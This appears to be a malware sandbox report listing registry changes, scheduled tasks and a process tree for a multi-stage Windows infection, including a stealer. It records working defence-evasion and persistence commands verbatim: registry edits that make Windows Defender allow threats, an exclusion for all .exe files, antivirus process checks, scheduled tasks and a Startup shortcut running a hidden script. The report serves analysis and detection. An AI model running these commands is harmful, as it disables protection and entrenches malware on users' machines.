| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … | C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe
"C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe
"C:\Users\Admin\AppData\Roaming\EzUlZHXCL1.exe"
C:\Users\Admin\AppData\Roaming\N4sHRj0hgX.exe
"C:\Users\Admin\AppData\Roaming\N4sHRj0hgX.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe
"C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe"
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe"
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe"
C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe
"C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
"C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
"C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\8herr1KvkD.exe
"C:\Users\Admin\AppData\Roaming\8herr1KvkD.exe"
C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe
"C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe"
C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 1936
C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe
"C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\1000270001\RMS1.exe' -Force
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
"C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Local\Temp\7zS6462.tmp\Install.exe
.\Install.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe
.\Install.exe /jNjwdidayi "385107" /S
C:\Windows\SysWOW64\cmd.exe
cmd /c md 684126
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\findstr.exe
findstr /V "VegetablesIndividualBindingGba" Ever
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
Intake.pif C
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
"C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 536
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe
"C:\Users\Admin\AppData\Local\Temp\1000306001\vlst.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bOYLEOfZCACcRQIJvG" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe\" c9 /kFdidSl 385107 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe
"C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe"
C:\Users\Admin\AppData\Local\Temp\filename.exe
"C:\Users\Admin\AppData\Local\Temp\filename.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 1936
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe c9 /kFdidSl 385107 /S
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
